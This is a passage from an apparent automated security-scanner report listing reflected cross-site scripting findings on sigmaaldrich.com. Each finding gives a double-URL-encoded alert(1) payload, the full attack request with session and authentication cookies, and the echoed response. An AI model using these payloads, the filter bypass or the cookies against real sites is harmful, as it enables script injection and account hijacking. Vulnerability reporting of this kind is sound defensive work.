Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:29 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc6a310";alert(1)//f26cf6c70bc/medialib/logos/center-graphics/services","E404") ;
   </script>
...[SNIP]...

1.409. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4d92%2522%253balert%25281%2529%252f%252f46ed92c24e1 was submitted in the REST URL parameter 2. This input was echoed as e4d92";alert(1)//46ed92c24e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibe4d92%2522%253balert%25281%2529%252f%252f46ed92c24e1/logos/center-graphics/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:31 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibe4d92";alert(1)//46ed92c24e1/logos/center-graphics/services","E404") ;
   </script>
...[SNIP]...

1.410. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2a36%2522%253balert%25281%2529%252f%252fc437b656de1 was submitted in the REST URL parameter 3. This input was echoed as f2a36";alert(1)//c437b656de1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logosf2a36%2522%253balert%25281%2529%252f%252fc437b656de1/center-graphics/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logosf2a36";alert(1)//c437b656de1/center-graphics/services","E404") ;
   </script>
...[SNIP]...

1.411. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0a1%2522%253balert%25281%2529%252f%252f9227d059c3 was submitted in the REST URL parameter 4. This input was echoed as 6a0a1";alert(1)//9227d059c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/center-graphics6a0a1%2522%253balert%25281%2529%252f%252f9227d059c3/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/center-graphics6a0a1";alert(1)//9227d059c3/services","E404") ;
   </script>
...[SNIP]...

1.412. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c5fe%2522%253balert%25281%2529%252f%252f608695bbae9 was submitted in the REST URL parameter 5. This input was echoed as 3c5fe";alert(1)//608695bbae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/logos/center-graphics/services3c5fe%2522%253balert%25281%2529%252f%252f608695bbae9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:37 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/logos/center-graphics/services3c5fe";alert(1)//608695bbae9","E404") ;
   </script>
...[SNIP]...

1.413. http://www.sigmaaldrich.com/etc/medialib/logos/sigma-aldrich-logo0 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/sigma-aldrich-logo0

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4905f%2522%253balert%25281%2529%252f%252f4f88a8734e2 was submitted in the REST URL parameter 1. This input was echoed as 4905f";alert(1)//4f88a8734e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc4905f%2522%253balert%25281%2529%252f%252f4f88a8734e2/medialib/logos/sigma-aldrich-logo0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; 